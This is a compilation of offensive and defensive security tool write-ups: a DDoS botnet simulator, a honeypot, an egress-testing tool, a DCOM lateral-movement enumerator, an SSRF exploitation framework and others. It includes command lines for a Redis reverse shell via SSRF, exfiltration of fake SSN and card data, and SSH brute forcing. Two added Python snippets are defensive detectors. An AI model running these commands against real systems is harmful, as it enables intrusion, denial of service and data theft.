BoNeSi, the DDoS Botnet Simulator, is a tool to simulate botnet traffic in a testbed environment on the wire. It is designed to study the effect of DDoS attacks.

_What traffic can be generated?_
BoNeSi generates ICMP, UDP and TCP (HTTP) flooding attacks from a defined botnet size (different IP addresses). BoNeSi is highly configurable: rates, data volume, source IP addresses, URLs and other parameters can be configured.

_What makes it different from other tools?_
There are plenty of other tools out there to spoof IP addresses with UDP and ICMP, but for TCP spoofing, there is no solution. BoNeSi is the first tool to simulate HTTP-GET floods from large-scale bot networks. BoNeSi also tries to avoid generating packets with easily identifiable patterns (which can be filtered out easily).

_Where can I run BoNeSi?_
We highly recommend running BoNeSi in a closed testbed environment. However, UDP and ICMP attacks could be run on the internet as well, but you should be careful. HTTP flooding attacks cannot be simulated on the internet, because answers from the webserver must be routed back to the host running BoNeSi.

_How does TCP spoofing work?_
BoNeSi sniffs for TCP packets on the network interface and responds to all packets in order to establish TCP connections. For this feature, it is necessary that all traffic from the target webserver is routed back to the host running BoNeSi.

_How good is the performance of BoNeSi?_
We focused very much on performance in order to simulate big botnets. On an AMD Opteron with 2 GHz we were able to generate up to 150,000 packets per second. On a more recent AMD Phenom II X6 1100T with 3.3 GHz you can generate 300,000 pps (running on 2 cores).

_Are BoNeSi attacks successful?_
Yes, they are very successful. UDP/ICMP attacks can easily fill the bandwidth and HTTP flooding attacks knock out webservers fast. We also tested BoNeSi against state-of-the-art commercial DDoS mitigation systems and were able to either crash them or hide the attack from being detected.

A demo video of BoNeSi in action can be found here.

Detailed Information

BoNeSi is a network traffic generator for different protocol types. The attributes of the created packets and connections can be controlled by several parameters, such as send rate or payload size, or they are determined by chance. It spoofs the source IP addresses even when generating TCP traffic. Therefore it includes a simple TCP stack to handle TCP connections in promiscuous mode. For it to work correctly, one has to ensure that the response packets are routed to the host on which BoNeSi is running. Therefore BoNeSi cannot be used in arbitrary network infrastructures. The most advanced kind of traffic that can be generated is HTTP requests.

TCP/HTTP

In order to make the HTTP requests more realistic, several things are determined by chance:

- source port
- ttl: 3..255
- tcp options: out of seven different real-life options with different lengths and probabilities
- user agent for http header: out of a list given by file (an example file is included, see below)

Copyright 2006-2007 Deutsches Forschungszentrum fuer Kuenstliche Intelligenz

This is free software. Licensed under the Apache License, Version 2.0. There is NO WARRANTY, to the extent permitted by law.

Installation

    :~$ ./configure
    :~$ make
    :~$ make install

Usage

    :~$ bonesi [OPTION…]

    Options:
      -i, --ips=FILENAME               filename with ip list
      -p, --protocol=PROTO             udp (default), icmp or tcp
      -r, --send_rate=NUM              packets per second, 0 = infinite (default)
      -s, --payload_size=SIZE          size of the paylod, (default: 32)
      -o, --stats_file=FILENAME        filename for the statistics, (default: 'stats')
      -c, --max_packets=NUM            maximum number of packets (requests at tcp/http), 0 = infinite (default)
          --integer                    IPs are integers in host byte order instead of in dotted notation
      -t, --max_bots=NUM               determine max_bots in the 24bit prefix randomly (1-256)
      -u, --url=URL                    the url (default: '/') (only for tcp/http)
      -l, --url_list=FILENAME          filename with url list (only for tcp/http)
      -b, --useragent_list=FILENAME    filename with useragent list (only for tcp/http)
      -d, --device=DEVICE              network listening device (only for tcp/http, e.g. eth1)
      -m, --mtu=NUM                    set MTU, (default 1500). Currently only when using TCP.
      -f, --frag=NUM                   set fragmentation mode (0=IP, 1=TCP, default: 0). Currently only when using TCP.
      -v, --verbose                    print additional debug messages
      -h, --help                       print help message and exit

Additionally Included Example Files

- 50k-bots: 50,000 ip addresses generated randomly to use with --ips option
- browserlist.txt: several browser identifications to use with --useragentlist option
- urllist.txt: several urls to use with --urllist option

Download Bonesi

A low interaction honeypot with the capability to be more of a medium interaction honeypot. HoneyPy is written in Python2 and is intended to be easy to:

- install and deploy
- extend with plugins and loggers
- run with custom configurations

Feel free to follow the QuickStart Guide to dive in directly. The main documentation can be found at the HoneyPy Docs site.

Live HoneyPy data gets posted to:

- Twitter: https://twitter.com/HoneyPyLog
- Web service endpoint and displayed via the HoneyDB web site: https://riskdiscovery.com/honeydb

Leave an issue or feature request! Use the GitHub issue tracker to tell us what's on your mind.

Pull requests are welcome! If you would like to create new plugins or improve existing ones, please do.

NOTE: HoneyPy has primarily been tested and run on Debian and Ubuntu using Python 2.7.9.

Overview

HoneyPy comes with a lot of plugins included. The level of interaction is determined by the functionality of the plugin used. Plugins can be created to emulate UDP or TCP based services to provide more interaction. All activity is logged to a file by default, but posting honeypot activity to Twitter or a web service endpoint can be configured as well.

Examples:

- Plugins: ElasticSearch, SIP, etc.
- Loggers: HoneyDB, Twitter, etc.

Download HoneyPy

Egress-Assess is a tool used to test egress data detection capabilities.

Setup

To set up, run the included setup script, or perform the following:

- Install pyftpdlib
- Generate a server certificate and store it as "server.pem" on the same level as Egress-Assess. This can be done with the following command:

    openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes

Usage

Blog posts are available here:

- https://www.christophertruncer.com/egress-assess-testing-egress-data-detection-capabilities/
- https://www.christophertruncer.com/egress-assess-action-via-powershell/

The typical use case for Egress-Assess is to copy this tool to two locations. One location will act as the server, the other will act as the client. Egress-Assess can send data over FTP, HTTP, and HTTPS.

To extract data over FTP, you would first start Egress-Assess's FTP server by selecting "--server ftp" and providing a username and password to use:

    ./Egress-Assess.py --server ftp --username testuser --password pass123

Now, to have the client connect and send data to the FTP server, you could run:

    ./Egress-Assess.py --client ftp --username testuser --password pass123 --ip 192.168.63.149 --datatype ssn

Also, you can set up Egress-Assess to act as a web server by running:

    ./Egress-Assess.py --server https

Then, to send data to the web server, and to specifically send 15 megs of credit card data, run the following command:

    ./Egress-Assess.py --client https --data-size 15 --ip 192.168.63.149 --datatype cc

Download Egress-Assess
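What a detection control being exercised by such a test could look for, as an added example (not part of Egress-Assess or of the original page): it scans an outbound payload for structurally valid SSNs and Luhn-valid card numbers. The sample payload, the `/post_data.php` path and the alert threshold are constructed, and the layout of the data Egress-Assess emits is an assumption.

```python
import re

# Card numbers: 13-19 digits, optionally grouped with spaces or hyphens.
CARD_RE = re.compile(r"(?<![\d-])(?:\d[ -]?){12,18}\d(?![\d-])")
# SSNs in the common AAA-GG-SSSS layout (assumed format).
SSN_RE = re.compile(r"(?<![\d-])(\d{3})-(\d{2})-(\d{4})(?![\d-])")

# Constructed sample of an HTTP body carrying test data (not captured traffic).
SAMPLE_PAYLOAD = (
    b"POST /post_data.php HTTP/1.1\r\nHost: 192.168.63.149\r\n\r\n"
    b"123-45-6789\n"           # structurally valid SSN
    b"000-12-3456\n"           # area 000 is never issued
    b"4111111111111111\n"      # passes the Luhn check
    b"4111111111111112\n"      # fails the Luhn check
    b"4111 1111 1111 1111\n"   # same number, grouped with spaces
)


def luhn_ok(digits: str) -> bool:
    """Luhn checksum: double every second digit from the right."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def ssn_ok(area: str, group: str, serial: str) -> bool:
    """Reject number ranges that are never assigned, to cut false positives."""
    if area in ("000", "666") or area[0] == "9":
        return False
    return group != "00" and serial != "0000"


def scan_payload(data: bytes) -> dict:
    """Return the card numbers and SSNs found in one outbound payload."""
    text = data.decode("latin-1")  # byte-transparent decoding
    cards = []
    for match in CARD_RE.finditer(text):
        digits = re.sub(r"\D", "", match.group())
        if luhn_ok(digits):
            cards.append(digits)
    ssns = [m.group() for m in SSN_RE.finditer(text) if ssn_ok(*m.groups())]
    return {"cc": cards, "ssn": ssns}


def should_alert(data: bytes, threshold: int = 3) -> bool:
    """Alert once a payload carries at least `threshold` validated hits."""
    hits = scan_payload(data)
    return len(hits["cc"]) + len(hits["ssn"]) >= threshold


if __name__ == "__main__":
    print(scan_payload(SAMPLE_PAYLOAD), should_alert(SAMPLE_PAYLOAD))
```

Content inspection of this kind only sees cleartext, so the HTTPS case needs TLS inspection or an endpoint sensor in front of it.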

Fibratus is a tool which is able to capture most of the Windows kernel activity: process/thread creation and termination, context switches, file system I/O, registry, network activity, DLL loading/unloading and much more. The kernel events can be easily streamed to a number of output sinks like AMQP message brokers, Elasticsearch clusters or the standard output stream. You can use filaments (lightweight Python modules) to extend Fibratus with your own arsenal of tools and so leverage the power of Python's ecosystem.

Installation

Download the latest release (Windows installer). The changelog and older releases can be found here.

Alternatively, you can get fibratus from PyPI.

1. Install the dependencies:
   - Download and install Python 3.4.
   - Install Visual Studio 2015 (you'll only need the Visual C compiler to build the kstreamc extension). Make sure to export the VS100COMNTOOLS environment variable so it points to %VS140COMNTOOLS%.
   - Get Cython:

         pip install "Cython>=0.23.4"

2. Install fibratus via the pip package manager:

       pip install fibratus

Documentation

See the wiki.

Download Fibratus

TROMMEL sifts through embedded device files to identify potential vulnerable indicators.

TROMMEL identifies the following indicators related to:

- Secure Shell (SSH) key files
- Secure Socket Layer (SSL) key files
- Internet Protocol (IP) addresses
- Uniform Resource Locator (URL)
- email addresses
- shell scripts
- web server binaries
- configuration files
- database files
- specific binary files (i.e. Dropbear, BusyBox, etc.)
- shared object library files
- web application scripting variables, and
- Android application package (APK) file permissions.

TROMMEL has also integrated vFeed, which allows for further in-depth vulnerability analysis of identified indicators.

Dependencies

- Python-Magic – See documentation for instructions for Python3-magic installation
- vFeed Database – For non-commercial use, register and download the Community Edition database

Usage

    $ trommel.py --help

Output TROMMEL results to a file based on a given directory. By default, only searches plain text files.

    $ trommel.py -p /directory -o output_file

Output TROMMEL results to a file based on a given directory. Search both binary and plain text files.

    $ trommel.py -p /directory -o output_file -b

Notes

- The intended use of TROMMEL is to assist researchers during firmware analysis.
- TROMMEL has been tested using Python3 on Kali Linux x86_64.
- TROMMEL was written with the intent to help with identifying indicators that may contain vulnerabilities found in firmware of embedded devices.

References

- vFeed
- Firmwalker
- Lua Code: Security Overview and Practical Approaches to Static Analysis by Andrei Costin

Author

Kyle O'Meara – komeara AT cert DOT org

Download Trommel

DCOMrade is a Powershell script that is able to enumerate the possible vulnerable DCOM applications that might allow for lateral movement, code execution, data exfiltration, etc. The script is built to work with Powershell 2.0 but will work with all versions above as well. The script currently supports the following Windows operating systems (both x86 and x64):

- Microsoft Windows 7
- Microsoft Windows 10
- Microsoft Windows Server 2012 / 2012 R2
- Microsoft Windows Server 2016

How it works

The script was made based on the research done by Matt Nelson (@enigma0x3), especially the round 2 blogpost that goes into finding DCOM applications that might be useful for pentesters and red teams.

First a remote connection with the target system is made; this connection is used throughout the script for a multitude of operations. A Powershell command is executed on the target system that retrieves all the DCOM applications and their AppIDs. The AppIDs are used to loop through the Windows Registry and check for any AppID that does not have the LaunchPermission subkey set in its entry; these AppIDs are stored and used to retrieve their associated CLSIDs.

The script uses a specific blacklist with each OS, which is why there are different options for the target operating system. The blacklist skips CLSID entries that might hang the script because of DCOM applications that cannot be activated; this reduces the load on the target system and reduces the time for the script to complete.

With the CLSID, the DCOM application associated with it can be activated. The 'Shortcut' CLSID is used to count the number of MemberTypes associated with it; this is done to check the default number of MemberTypes. This number is used to check for the CLSIDs that hold anything different from this amount. The script does this with the CLSID of the 'Shortcut' (HKEY_CLASSES_ROOT\CLSID\{00021401-0000-0000-C000-000000000046}) because this is a shared CLSID across the Microsoft Windows operating systems.

The CLSIDs with a different number of MemberTypes might hold a Method or Property that can be (ab)used, and will be added to an array. The CLSIDs in the array are checked for strings in the MemberTypes that might indicate a way to (ab)use them; this list of strings can be found in the VulnerableSubset file. Please note that this list is by no means a complete list to find every single vulnerable DCOM application, but this list being a dynamic part of the process should give the user of the script a way to look for specific strings that might indicate a functionality of a DCOM application that might be useful for their purpose.

The results of the script are output in an HTML report and should be usable for auditing a system as a preventive measure. For the offensive side I created an Empire module which at the time of writing is awaiting approval to be added to the master branch. If you would like to add this to Empire yourself you can do so by adding the module located here.

For a full technical explanation of the idea, the script and possible detection methods you can read the research paper associated with this.

Prerequisites

The script, when not being used as an Empire module, has some limitations, as the working of the script and how it connects with the target machine differ.

- For this script to work, the Windows Remote Management services need to be allowed in the Windows Firewall (5985);
- If the target system's network profile is set to Public, the following command needs to be executed to allow Windows Remote Management services to be used on the target system:

      Enable-PSRemoting -SkipNetworkProfilecheck -Force

- This script only works when one has the credentials of a local Administrator on the target system. Without these credentials you will not be able to start a remote session with the target machine, or be able to activate DCOM applications.

Example usage

When in a Microsoft Windows domain:

    .\DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System] -Domain [Domain name]

When not in a Microsoft Windows domain:

    .\DCOMrade.ps1 -ComputerName [Computername / IP] -User [Local Administrator] -OS [Operating System]

Limitations

- Currently the script does try to release any instantiated / activated DCOM applications, but some activations start new processes (such as Internet Explorer). The process could be stopped, but this would mean that if a user on the target system is using that particular application, this process will stop for them as well;
- Another thing, which probably has to do with my bad coding skills, is that the script might introduce considerable load on the target system if the target system does not have a lot of resources. Be considerate when using this in a production environment or on servers;
- The script might take some time to execute completely; this depends on the number of DCOM applications and the size of the vulnerable subset file.

Acknowledgements

- This script was inspired by a DCOM lateral movement workshop that was given by Eva Tanaskoska; without this workshop the whole idea of trying to enumerate this in an automated manner would never have been conceived.
- Thanks to Matt Nelson's (a.k.a. @enigma0x3) research I was able to find enough information to come up with a form of automation.
- Philip Tsukerman's article, which sums up most of the available DCOM techniques for lateral movement and goes into how these work.

Download DCOMrade

Ponce (pronounced _[ 'poN θe ]_ pon-they) is an IDA Pro plugin that provides users the ability to perform taint analysis and symbolic execution over binaries in an easy and intuitive fashion. With Ponce you are one click away from getting all the power from cutting edge symbolic execution. Entirely written in C/C++.

Why?

Symbolic execution is not a new concept in the security community. It has been around for years but it is not until the last couple of years that open source projects like Triton and Angr have been created to address this need. Despite the availability of these projects, end users are often left to implement specific use cases themselves.

We addressed these needs by creating Ponce, an IDA plugin that implements symbolic execution and taint analysis within the most used disassembler/debugger for reverse engineers.

Installation

Ponce works with both x86 and x64 binaries in IDA 6.8 and IDA 6.9x. Installing the plugin is as simple as copying the appropriate files from the latest builds to the plugins folder in your IDA installation directory.

IDA 7.0: Ponce has initial support for IDA 7.0 for both x86 and x64 binaries on Windows. The plugin named Ponce64.dll should be copied from the latest_builds to the plugins folder in your IDA installation directory. Starting from version 7.0, IDA64 should be used to work with both x86 and x64 binaries. Don't forget to register Ponce in plugins.cfg, located in the same folder, by adding the following line:

    Ponce Ponce Ctrl+Shift+Z 0 WIN

OS Support

Ponce works on Windows, Linux and OSX natively!

Use cases

- Exploit development: Ponce can help you create an exploit in a far more efficient manner, as the exploit developer may easily see what parts of memory and which registers they control, as well as possible addresses which can be leveraged as ROP gadgets.
- Malware Analysis: Another use of Ponce is related to malware code. The commands a particular family of malware supports are easily determined by symbolizing a simple known command and negating all the conditions where the command is being checked.
- Protocol Reversing: One of the most interesting Ponce uses is the possibility of recognizing required magic numbers, headers or even entire protocols for controlled user input. For instance, Ponce can help you to list all the accepted arguments for a given command line binary or extract the file format required for a specific file parser.
- CTF: Ponce speeds up the process of reverse engineering binaries during CTFs. As Ponce is totally integrated into IDA you don't need to worry about setup time. It's ready to be used!

The plugin will automatically run, guiding you through the initial configuration the first time it is run. The configuration will be saved to a configuration file so you won't have to worry about the config window again.

Use modes

- Tainting engine: This engine is used to determine at every step of the binary's execution which parts of memory and registers are controllable by the user input.
- Symbolic engine: This engine maintains a symbolic state of registers and part of memory at each step in a binary's execution path.

Examples

Use symbolic execution to solve a crackMe

Here we can see the use of the symbolic engine and how we can solve constraints:

- Passing simple aaaaa as argument.
- We first select the symbolic engine.
- We convert to symbolic the memory pointed to by argv[1] (aaaaa).
- Identify the symbolic condition that makes us win and solve it.
- Test the solution.

The crackme source code can be found here.

Negate and inject a condition

In the next gif we can see the use of automatic tainting and how we can negate a condition and inject it in memory while debugging:

- We select the symbolic engine and set the option to symbolize argv.
- We identify the condition that needs to be satisfied to win the crackMe.
- We negate and inject the solution every time a byte of our input is checked against the key.
- Finally we get the key elite that has been injected in memory and therefore reach the Win code.

The crackme source code can be found here.

Using the tainting engine to track user controlled input

In this example we can see the use of the tainting engine with cmake. We are:

- Passing a file as argument to cmake to have it parse it.
- We select that we want to use the tainting engine.
- We taint the buffer that `fread()` reads from the file.
- We resume the execution under the debugger's control to see where the tainted input is moved to.
- Ponce will rename the tainted functions. These are the functions that the user somehow has influence on, not the functions that were simply executed.

Use Negate, Inject & Restore

In the next example we are using the snapshot engine:

- Passing a file as argument.
- We select that we want to use the symbolic engine.
- We taint the buffer that `fread()` reads from the file.
- We create a snapshot in the function that parses the buffer read from the file.
- When a condition is evaluated we negate it, inject the solution in memory and restore the snapshot with it.
- The solution will be "valid" so we will satisfy the existing conditions.

The example source code can be found here.

Usage

In this section we will list the different Ponce options as well as keyboard shortcuts:

- Access the configuration and taint/symbolic windows: Edit > Ponce > Show Config (Ctl+Shift+P and Ctl+Alt+T)
- Enable/Disable Ponce tracing (Ctl+Shift+E)
- Symbolize/taint a register (Ctl+Shift+R)
- Symbolize/taint memory. Can be done from the IDA View or the Hex View (Ctl+Shift+M)
- Solve formula (Ctl+Shift+S)
- Negate & Inject (Ctl+Shift+N)
- Negate, Inject & Restore Snapshot (Ctl+Shift+I)
- Create Execution Snapshot (Ctl+Shift+C)
- Restore Execution Snapshot (Ctl+Shift+S)
- Delete Execution Snapshot (Ctl+Shift+D)
- Execute Native (Ctl+Shift+F9)

Triton

Ponce relies on the Triton framework to provide semantics, taint analysis and symbolic execution. Triton is an awesome Open Source project sponsored by Quarkslab and maintained mainly by Jonathan Salwan with a rich library. We would like to thank and endorse Jonathan's work with Triton. You rock! 🙂

Building

We provide compiled binaries for Ponce, but if you want to build your own plugin you can do so using Visual Studio 2013. We tried to make the building process as easy as possible:

- Clone the project with submodules:

      git clone --recursive https://github.com/illera88/PonceProject.git

- Open Build\PonceBuild\Ponce.sln: The project configuration is ready to use the includes and libraries shipped with the project that reside in external-libs.
- The VS project has a Post-Build Event that will move the created binary plugin to the IDA plugin folder for you:

      copy /Y $(TargetPath) "C:\Program Files (x86)\IDA 6.9\plugins"

  NOTE: use your IDA installation path.

The project has 4 build configurations:

- x86ReleaseStatic: will create the 32 bits version statically linking every third party library into a whole large plugin file.
- x86ReleaseZ3dyn: will create the 32 bits version statically linking every third party library but z3.lib.
- x64ReleaseStatic: will create the 64 bits version statically linking every third party library into a whole large plugin file.
- x64ReleaseZ3dyn: will create the 64 bits version statically linking every third party library but z3.lib.

The static version of z3.lib is ~1.1Gb and the linking time is considerable. That's the main reason why we have a build version that uses z3 dynamically (as a dll). If you are using z3 dynamically don't forget to copy the libz3.dll file into IDA's directory.

If you want to build Triton for Linux or Mac OS X check this file: https://github.com/illera88/Ponce/tree/master/builds/PonceBuild/nix/README.md

FAQ

Why the name of Ponce?

Juan Ponce de León (1474 – July 1521) was a Spanish explorer and conquistador. He discovered Florida in the United States. The IDA plugin will help you discover, explore and hopefully conquer the different paths in a binary.

Can Ponce be used to analyze Windows, OS X and Linux binaries?

Yes, you can natively use Ponce in IDA for Windows or remotely attach to a Linux or OS X box and use it. In the next Ponce version we will natively support Ponce for Linux and OS X IDA versions.

How many instructions per second can Ponce handle?

In our tests we were able to process 3000 instructions per second. We plan to use the PIN tracer IDA offers to increase the speed.

Something is not working!

Open an issue, we will solve it ASAP 😉

I love your project! Can I collaborate?

Sure! Please do pull requests and work on the open issues. We will pay you in beers for help 😉

Limitations

Concolic execution and Ponce have some problems:

- Symbolic memory load/write: When the index used to read a memory value is symbolic, as in x = array[symbolic_index], some problems arise that could lead to losing track of the tainted/symbolized user controlled input.
- Triton doesn't work very well with floating point instructions.

Authors

- Alberto Garcia Illera (@algillera)
- Francisco Oca (@francisco_oca)

Download Ponce

kaboom is a script that automates the penetration test. It performs several tasks for each phase of the pentest:

- Information gathering [nmap-unicornscan]
  - TCP scan
  - UDP scan
- Vulnerability assessment [nmap-nikto-dirb-searchsploit-msfconsole]
  - It tests several services: smb, ssh, snmp, smtp, ftp, tftp, ms-sql, mysql, rdp, http, https and more…
  - It finds the CVEs and then searches for them on exploit-db or Metasploit db.
- Exploitation [hydra]
  - brute force ssh

Usage

kaboom supports two modes:

Interactive mode:

    kaboom [ENTER]

…and the script does the rest.

NON-interactive mode:

    kaboom [-s or --shutdown]

If you use the shutdown option, kaboom will shut down the machine at the end of the tasks.

If you want to see this help:

    kaboom -h (or --help)

Directory Hierarchy

kaboom saves the results of commands in this way:

Download Kaboom

SSRF is often used to leverage actions on other services; this framework aims to find and exploit these services easily. SSRFmap takes a Burp request file as input and a parameter to fuzz.

Server Side Request Forgery or SSRF is a vulnerability in which an attacker forces a server to perform requests on their behalf.

Guide / RTFM

Basic install from the Github repository.

    git clone https://github.com/swisskyrepo/SSRFmap
    cd SSRFmap/
    python3 ssrfmap.py

    usage: ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lport LPORT] [--level LEVEL]

    optional arguments:
      -h, --help       show this help message and exit
      -r REQFILE       SSRF Request file
      -p PARAM         SSRF Parameter to target
      -m MODULES       SSRF Modules to enable
      -l HANDLER       Start an handler for a reverse shell
      --lhost LHOST    LHOST reverse shell
      --lport LPORT    LPORT reverse shell
      --level [LEVEL]  Level of test to perform (1-5, default: 1)

The default way to use this script is the following.

    # Launch a portscan on localhost and read default files
    python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan

    # Triggering a reverse shell on a Redis
    python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242

    # -l creates a listener for a reverse shell on the specified port
    # --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
    # --level : ability to tweak payloads in order to bypass some IDS/WAF. e.g: 127.0.0.1 -> [::] -> 0000: -> …

A quick way to test the framework is with the data/example.py SSRF service.

    FLASK_APP=data/example.py flask run &
    python ssrfmap.py -r data/request.txt -p url -m readfiles

Modules

The following modules are already implemented and can be used with the -m argument.

| Name | Description |
|---|---|
| fastcgi | FastCGI RCE |
| redis | Redis RCE |
| github | Github Enterprise RCE < 2.8.7 |
| zaddix | Zaddix RCE |
| mysql | MySQL Command execution |
| docker | Docker Infoleaks via API |
| smtp | SMTP send mail |
| portscan | Scan ports for the host |
| networkscan | HTTP Ping sweep over the network |
| readfiles | Read files such as /etc/passwd |
| alibaba | Read files from the provider (e.g: meta-data, user-data) |
| aws | Read files from the provider (e.g: meta-data, user-data) |
| digitalocean | Read files from the provider (e.g: meta-data, user-data) |
| socksproxy | SOCKS4 Proxy |
| smbhash | Force an SMB authentication via a UNC Path |

Inspired by

- All you need to know about SSRF and how may we write tools to do auto-detect – Auxy
- How I Chained 4 vulnerabilities on GitHub Enterprise, From SSRF Execution Chain to RCE! – Orange Tsai
- Blog on Gopherus Tool – SpyD3r
- Gopherus – Github
- SSRF testing – cujanovic

Download SSRFmap
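On the server side, the alternate spellings of 127.0.0.1 mentioned under --level and the metadata reads in the module table are why a string blocklist is not a sufficient SSRF filter. The following added example (not part of SSRFmap or the original page) checks a user-supplied URL by the address it actually designates; the host names and the DNS table are constructed, and `check_url` and its helpers are hypothetical names.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # rejects gopher://, file://, dict:// ...

# Constructed DNS answers so the example runs offline.
CONSTRUCTED_DNS = {
    "cdn.example": ["93.184.216.34"],
    "metadata.example": ["169.254.169.254"],
}


def constructed_resolve(host):
    return CONSTRUCTED_DNS.get(host, [])


def system_resolve(host):
    """Resolve with the system resolver; returns a list of address strings."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})


def parse_ip_literal(host):
    """Return an address object if host is an IP literal in any spelling."""
    try:
        return ipaddress.ip_address(host)  # dotted quad or IPv6 such as "::"
    except ValueError:
        pass
    try:
        # Legacy IPv4 spellings that many HTTP clients still accept:
        # "2130706433", "0x7f.1", "017700000001" all mean 127.0.0.1.
        return ipaddress.IPv4Address(socket.inet_aton(host))
    except (OSError, ValueError):
        return None


def is_internal(ip):
    """True for loopback, private, link-local, unspecified, reserved, multicast."""
    mapped = getattr(ip, "ipv4_mapped", None)  # ::ffff:a.b.c.d -> a.b.c.d
    if mapped is not None:
        ip = mapped
    return (not ip.is_global) or ip.is_multicast


def check_url(url, resolve=system_resolve):
    """Return (allowed, reason, addresses) for a user-supplied fetch target."""
    try:
        parts = urlsplit(url)
        host = parts.hostname
    except ValueError:
        return False, "unparseable URL", []
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed", []
    if not host:
        return False, "no host", []
    literal = parse_ip_literal(host)
    if literal is not None:
        addrs = [literal]
    else:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolve(host)]
        except (OSError, ValueError):
            addrs = []
    if not addrs:
        return False, "host does not resolve", []
    for ip in addrs:
        if is_internal(ip):
            return False, f"internal address {ip}", []
    # The caller should connect to exactly these addresses (no second DNS
    # lookup, which would allow rebinding) and re-run this on every redirect.
    return True, "ok", [str(ip) for ip in addrs]


if __name__ == "__main__":
    for target in ("http://[::]/", "http://2130706433/", "http://cdn.example/a.png"):
        print(target, check_url(target, constructed_resolve))
```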

Pompem is an open source tool designed to automate the search for exploits and vulnerabilities in the most important databases. Developed in Python, it has an advanced search system that helps the work of pentesters and ethical hackers. In the current version, it performs searches in PacketStorm security, CXSecurity, ZeroDay, Vulners, National Vulnerability Database, WPScan Vulnerability Database …

Source code

You can download the latest tarball by clicking here or the latest zipball by clicking here.

You can also download Pompem directly from its Git repository:

    $ git clone https://github.com/rfunix/Pompem.git

Dependencies

Pompem works out of the box with Python 3.5 on any platform and requires the following packages:

- Requests 2.9.1+

Installation

Get Pompem up and running in a single command:

    $ pip3.5 install -r requirements.txt

You may greatly benefit from using virtualenv, which isolates packages installed for every project. If you have never used it, simply check [this tutorial](http://docs.python-guide.org/en/latest/dev/virtualenvs).

Usage

To get the list of basic options and information about the project:

    $ python3.5 pompem.py -h

    Options:
      -h, --help      show this help message and exit
      -s, --search    text for search
      --txt           Write txt File
      --html          Write html File

Examples of use:

    $ python3.5 pompem.py -s WordPress
    $ python3.5 pompem.py -s Joomla --html
    $ python3.5 pompem.py -s "Internet Explorer,joomla,wordpress" --html
    $ python3.5 pompem.py -s FortiGate --txt
    $ python3.5 pompem.py -s ssh,ftp,mysql

Download Pompem